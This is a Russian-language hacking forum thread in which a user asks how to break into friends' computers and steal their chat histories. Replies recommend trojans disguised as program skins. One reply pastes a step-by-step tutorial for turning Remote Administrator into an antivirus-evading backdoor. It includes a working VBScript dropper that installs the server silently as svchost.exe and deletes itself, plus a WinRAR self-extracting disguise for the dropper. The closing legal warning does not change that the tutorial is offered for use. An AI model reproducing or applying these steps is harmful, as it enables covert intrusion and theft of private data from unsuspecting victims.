IPB

Здравствуйте, гость ( Вход | Регистрация )

 
Reply to this topicStart new topic
> Как попасть на комп. жертвы?
neic1
сообщение Mar 4 2007, 12:41
Сообщение #1


Member
**

Группа: Members
Сообщений: 67
Регистрация: 10.8.2006
Пользователь №: 25997



Поделитесь способами проникновения в комп. жертвы.
Хочу выдрать некоторую инфо. от некоторых друзей.
Go to the top of the page
 
+Quote Post
memb3r
сообщение Mar 4 2007, 17:53
Сообщение #2


Grand Member
****

Группа: Members
Сообщений: 325
Регистрация: 26.12.2005
Пользователь №: 29043



Через уязвимости ...
Go to the top of the page
 
+Quote Post
neic1
сообщение Mar 5 2007, 09:50
Сообщение #3


Member
**

Группа: Members
Сообщений: 67
Регистрация: 10.8.2006
Пользователь №: 25997



memb3r
Можешь подсказать какие? Хотя бы самые примититвные.
Go to the top of the page
 
+Quote Post
memb3r
сообщение Mar 6 2007, 22:52
Сообщение #4


Grand Member
****

Группа: Members
Сообщений: 325
Регистрация: 26.12.2005
Пользователь №: 29043



Бэкдор, уязвимости ОС и т.д.
Go to the top of the page
 
+Quote Post
@ндрюха!
сообщение Mar 6 2007, 23:42
Сообщение #5


Advanced Member
***

Группа: Members
Сообщений: 168
Регистрация: 13.9.2006
Пользователь №: 26251



Цитата(neic1;31429)
memb3r
Можешь подсказать какие? Хотя бы самые примититвные.

Ну вот мне надо было у чувака по сети смониторить пасс к номерку- а пасс храниццо (хоть и шифрован) в файле Config.ini
Я написал на делфи примитивную передачу файлов - он открыл и оно пока он читал что на форме передало мне этот файлик и все!
Тебе что имено спи**ть надо? какой то файл?
Go to the top of the page
 
+Quote Post
pure.1t
сообщение Mar 7 2007, 00:53
Сообщение #6


Junior Member
*

Группа: Members
Сообщений: 1
Регистрация: 7.3.2007
Пользователь №: 27379



юзай Remote Admimistrator...или СИ.
Go to the top of the page
 
+Quote Post
neic1
сообщение Mar 7 2007, 11:44
Сообщение #7


Member
**

Группа: Members
Сообщений: 67
Регистрация: 10.8.2006
Пользователь №: 25997



Мне хистории скомуниздить(полностью) примерно с 5-7 компов.

Насчёт проги которая будет красть файлы, проблем нету. Меня интересует как проникнуть, что надо знать? Что с эти делать, что бы попасть на комп.
Go to the top of the page
 
+Quote Post
@ндрюха!
сообщение Mar 7 2007, 23:15
Сообщение #8


Advanced Member
***

Группа: Members
Сообщений: 168
Регистрация: 13.9.2006
Пользователь №: 26251



Цитата(neic1;31487)
Мне хистории скомуниздить(полностью) примерно с 5-7 компов.

Насчёт проги которая будет красть файлы, проблем нету. Меня интересует как проникнуть, что надо знать? Что с эти делать, что бы попасть на комп.

так если нету проблемы с программой в чем проблема? напиши сам троян и всунь тому. Ну вот я пер файл - один и тот же метод и с хистори. Например скажи что типа "на тебе скин для программы" только он работает с этим приложением и в начале нада приложение установить. Естествено скин будет работать номано а преложение, которое ты впихнеш и будет твоим трояном. Поставь потом ему самоудаление и нет проблем.
Или твои удаленные жертвы не сильно тупые?
Go to the top of the page
 
+Quote Post
neic1
сообщение Mar 9 2007, 17:37
Сообщение #9


Member
**

Группа: Members
Сообщений: 67
Регистрация: 10.8.2006
Пользователь №: 25997



Есть особи умные (их 70%), я могу канешн сказать, мол типа надо попробовать, но я хочу вообще не заметно.
Go to the top of the page
 
+Quote Post
@ндрюха!
сообщение Mar 9 2007, 23:12
Сообщение #10


Advanced Member
***

Группа: Members
Сообщений: 168
Регистрация: 13.9.2006
Пользователь №: 26251



Цитата(neic1;31571)
Есть особи умные (их 70%), я могу канешн сказать, мол типа надо попробовать, но я хочу вообще не заметно.

Ну если "особи" умные и знают что такое Firewall то тебе врятли что либо просто так удасцо. Придумай такой метод чтобі они сами откріли трояна твоего и не удевились что он запрашивает сетевую актинвость.
Того у кого руки не из ... ростут ті просто не взламаешь!
Кстате
умніе сматря для кого и в чьем случае (IMG:http://forum.iseekyou.im/style_emoticons/default/smile.gif) они знают что такое файрвллл? умеют им пользоваццЪо?
Go to the top of the page
 
+Quote Post
neic1
сообщение Mar 11 2007, 12:50
Сообщение #11


Member
**

Группа: Members
Сообщений: 67
Регистрация: 10.8.2006
Пользователь №: 25997



Файрвол если стоит, то только у 10% (IMG:http://forum.iseekyou.im/style_emoticons/default/biggrin.gif) (IMG:http://forum.iseekyou.im/style_emoticons/default/biggrin.gif)
Я хочу чтобы через ActveX загружался трой (через страницу), ну или подругому .
Go to the top of the page
 
+Quote Post
@ндрюха!
сообщение Mar 11 2007, 19:37
Сообщение #12


Advanced Member
***

Группа: Members
Сообщений: 168
Регистрация: 13.9.2006
Пользователь №: 26251



Цитата(neic1;31630)
Файрвол если стоит, то только у 10% (IMG:http://forum.iseekyou.im/style_emoticons/default/biggrin.gif) (IMG:http://forum.iseekyou.im/style_emoticons/default/biggrin.gif)
Я хочу чтобы через ActveX загружался трой (через страницу), ну или подругому .

Если файрволл у 10% то ты победил на 90%
А как это черехз активекс????
Я просто даю прогу типа на глянь и она там на винте прячиццо и ставит в реестре себя на автозапуск. работает - видно тока в диспетчере задач та и то под именем svchost.
Go to the top of the page
 
+Quote Post
neic1
сообщение Mar 14 2007, 23:46
Сообщение #13


Member
**

Группа: Members
Сообщений: 67
Регистрация: 10.8.2006
Пользователь №: 25997



Да от диспетчера могу спрятать, опыта хватает!

Просто хотелось бы без : НА посмотри...
Go to the top of the page
 
+Quote Post
@ндрюха!
сообщение Mar 15 2007, 00:51
Сообщение #14


Advanced Member
***

Группа: Members
Сообщений: 168
Регистрация: 13.9.2006
Пользователь №: 26251



Цитата(neic1;31734)
Да от диспетчера могу спрятать, опыта хватает!

Просто хотелось бы без : НА посмотри...

Ну вот у меня есть статейка ТОЛЬКО Я НЕ ПРОБЫВАЛ И ГАРАНТИИ ЧТО АНА РАБОАТЕТ НЕ ДАЮ

Всё написанное предполагает использование в LAN (LAN - Local Area Network, в народе "локалка"), однако
вполне справедливо и для остальных сетевых систем и может быть с лёгкостью под них заточено (IMG:http://forum.iseekyou.im/style_emoticons/default/smile.gif)

Итак, начнём! Что нам понадобится:
1. Прямые руки
2. Хотя бы начальные знания по программированию на скриптовых языках
3. Установочный пакет Remote Administrator не ниже 2.0
4. Программа Resource Hacker aka ResHacker
5. Упаковщик PE EXE файлов ASPack

После того как мы заюзаем поисковик www.nigma.ru и вооружимся всем необходимым, нужно проверить,
на месте ли руки и насколько хорошо работает серое вещество (IMG:http://forum.iseekyou.im/style_emoticons/default/smile.gif) Только после этого рекомендую
приступать непосредственно к действию. Начнём!

I. Для начала установим все скачанные программы куда следует. По желанию можно и крякнуть кое-какие
из них (IMG:http://forum.iseekyou.im/style_emoticons/default/wink.gif) Но особой необходимости в этом нет.

II. Возьмём утилиту ResHacker. Она представляет собой отличный редактор ресурсов, т.е. с её помощью
можно редактировать исполняемые файлы и библиотеки, вырезать/заменять/сохранять рисунки, курсоры,
диалоги и всё остальное, что имеется в приложениях. Чем мы сейчас и займёмся.

III. Запускаем ResHacker, открываем в нём серверную часть Remote Administrator'a, которая наверняка
лежит у тебя здесь: C:Program FilesRAdminr_server.exe. Нашёл? Открыл? Теперь смотрим, что здесь
у нас имеется. Тааак... Хм... Видим 6 пунктов: Icon, Menu, Dialog, String Table, RCData, Icon Group.
Вот это нам и надо! Берём и смело удаляем то, что, на наш взгляд, трояну абсолютно ни к чему. Зачем,
например, иконки? Удалить... А вон диалог такой зачем? Удалить... А зачем иконка RAdmin в трее?! (IMG:http://forum.iseekyou.im/style_emoticons/default/wink.gif)
Главное при этом - не увлекаться и ни в коем случае не удалять пункты String Table и RCData. Почему?
Потому что они жизненно необходимы для работы программы. И крайне важно не зацепить ненароком те ди-
алоги, которые понадобятся для настроек будущего зверька. Если вы покопаетесь для начала в "живой и
здоровой" версии RAdmin'a, то поймёте, какие диалоги для чего нужны.
Это ещё не всё. Нужно на всякий пожарный удалить фразу "Remote Administrator" отовсюду, где она
встречается, в том числе и из пунктов String Table и RCData. Мало ли...
Во время копания в файле не забывайте периодически сохраняться и запускать его для того, чтобы
проверить, а не вырезали ли мы чего лишнего и работает ли он вообще?!

ВНИМАНИЕ! Для работы серверная часть нуждается в файле AdmDll.dll той же директории, что и файл
r_server.exe!!! Не забудьте скопировать их вместе в отдельную папку для наших опытов.

VI. После того как мы убедимся, что вырезать уже больше нечего, а получившийся файл ещё работает,
приступаем к следующей стадии. Запускаем программу ASPack, выставляем в настройках максимальное
сжатие и жмём этой прогой наш файл. Сжали? Теперь нужно снова попробовать запустить его, чтобы убе-
диться в работоспособности. Ошибок не выдаёт? Смотрим в процессы... вот он, родимый, висит! Есть!!!
Возня с РАдмином закончена. Правда, назвать его РАдмином ТЕПЕРЬ довольно сложно... Думаете, не так?
ОК, сейчас мы проверим, что думают об этом независимые эксперты. Кто? Догадайтесь с трёх раз, зачем
мы провели всю эту процедуру. Я уверен: специально для того, чтобы наш зверёк не попался охотникам,
которые в народе именуются антивирями. Да, к сожалению, с недавних пор РАдмин начал определяться
практически всеми антивирусными пакетами. Но что они скажут теперь?!
Поделюсь опытом: я скормил свой файл следующим антивирусам:

- Kaspersky 6.0 (базы декабрь 2006)
- NOD32 v2.7 (базы январь 2007)
- Avast! (новые базы)
- DrWEB v4.33 (новые базы)
- Norton Antivirus (новые базы)

Ответом на сканирование было молчание. Quod erat demonstrandum, что и требовалось доказать. Полдела
сделано! Идём к самой интересной (или наоборот, кому как) части. Сейчас будем писать троян-дроппер.
Но сначала, чтобы наш файл попал на чей-нибудь комп, нужно расшарить (Share - "открывать в доступ")
папку и положить туда r_server.exe и AdmDll.dll, переименовав, допустим, в Документ.doc и ReadMe.txt

V. Что это такое? Английское слово drop - "ронять", если дословно. Отсюда "dropper" - "ронятель" (IMG:http://forum.iseekyou.im/style_emoticons/default/smile.gif)
Иными словами, это программа, которая при запуске скачивает откуда надо другую программу, как
правило саму серверную часть, и запускает с определёнными параметрами или без них, а также может
совершать другие, не менее полезные действия (IMG:http://forum.iseekyou.im/style_emoticons/default/wink.gif)
Для написания дроппера нам потребуется следующее:

- Блокнот из стандартного набора Windows
- Знание Visual Basic Script (не путать с Visual Basic!!!)
- Минимальные знания сетевых технологий и информационной безопасности
- Знание особенностей мышления людей в целом и нужного человека в частности (IMG:http://forum.iseekyou.im/style_emoticons/default/wink.gif)
- ОБЯЗАТЕЛЬНО знать, что такое социальная инженерия
- Желательно знать, какие программы установлены на целевой машине

Для начала откроем Блокнот. Перед нами, если честно, очень широкий простор для фантазии. VBScript
умеет следующее:

- Создавать, удалять, перемещать, переименовывать файлы, директории
- Устанавливать и читать атрибуты файлов и директорий
- Сканировать (с помощью средств Windows) локальную сеть и пинговать компьютеры
- Открывать в доступ папки
- Сносить процессы, в том числе системные
- Управлять запущенными процессами и запускать свои
- Отправлять e-mail куда надо, прикрепляя файлы
- Вытаскивать всю информацию о системе
и многое-многое другое; статья посвящена не перечислению всех достоинств и недостатков VBS

Однако продолжим (IMG:http://forum.iseekyou.im/style_emoticons/default/smile.gif) Пишем в Блокноте следующие строки:

On error resume next 'вставляем обработчик ошибок
Set FSO = CreateObject("Scripting.FileSystemObject") 'переменная FSO для работы с файлами и папками
Set WSHSHELL = CreateObject("WScript.Shell") 'Шелл для запуска программ, записи в реестр и пр.
Set File = FSO.GetFile("hostnamedirectoryДокумент.doc") 'находим переименованный r_server.exe
Set File2 = FSO.GetFile("hostnamedirectoryReadMe.txt") 'находим AdmDll.dll
File.Copy("C:WINDOWSSystemsvchost.exe") 'копируем на целевой комп
File2.Copy("C:WINDOWSSystemAdmDll.dll") 'туда же
WSHSHELL.Run"C:WINDOWSSystemsvchost.exe /install /port:4888 /pass:здесьпароль /silence /save"
FSO.DeleteFile("*.vbs") 'смываемся
WScript.Quit(0) 'окончательно смываемся

Что у нас получилось? Самый настоящий троян-дроппер, который скопирует что надо и запустит на
компе, который нам нужно... Ну, неважно! (IMG:http://forum.iseekyou.im/style_emoticons/default/smile.gif)

Разумеется, эти 10 строк - минимум, какой только можно придумать. Знающие люди могут значительно
усовершенствовать данный код, например:

- Добавить запись в реестр параметр скрытия иконки RAdmin'a из трея
- Отключить брандмауэр Windows
- Отправить себе письмо с IP-адресом жертвы

Можно также закодировать скрипт с помощью Windows Script Encoder, чтобы не было видно исходного
кода и в нём - вашего адреса.
Но юзер же заподозрит неладное, увидев незнакомую иконку?! Не беда, есть 2 пути, чтобы этого
избежать. На самом деле не два, но я рассмотрю всего один.

IV. Берём архиватор WinRAR. Запаковываем наш скрипт, ставим галочку "Создать SFX-архив". Переходим
на другую вкладку, там жмём "Параметры SFX". Что мы здесь видим? О-о-о, да просто рай для нас!
Можно сделать файлу любую иконку, можно скрыть все диалоги распаковки... Фантазируйте, используйте
стереотипы мышления людей, которые уверены, что в текстовых файлах вирусов не бывает!
После запаковки получаем файл с вашей иконкой и расширением *.ехе, которое скрыто при настройках
по умолчанию и не отображается в системе. ВСЁ! Троян готов! Теперь можно смело засылать его юзверю
и ждать, когда же он перезагрузится, а потом открывать Remote Administrator Client и подключаться
к его машине.



P.S. Статья простейшая, всё это делается максимум за 3 часа, а при наличии знаний и опыта гораздо
быстрее и практически со 100% успехом.

Да, и ещё: перед тем как всё это делать, почитайте статьи 273-275 УК РФ и задумайтесь, а охота
ли получить по чайнику? Даже от того, кому ваше творение придётся испытать на себе?
Не делай другому того, чего не хочешь сам.


ВНИМАНИЕ! В статье намеренно опущены некоторые подробности, одна критического характера, другая
может вызвать у пользователя за целевой машиной некоторые подозрения относительно
своей безопасности.
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 



Текстовая версия Сейчас: 29th December 2024 - 02:40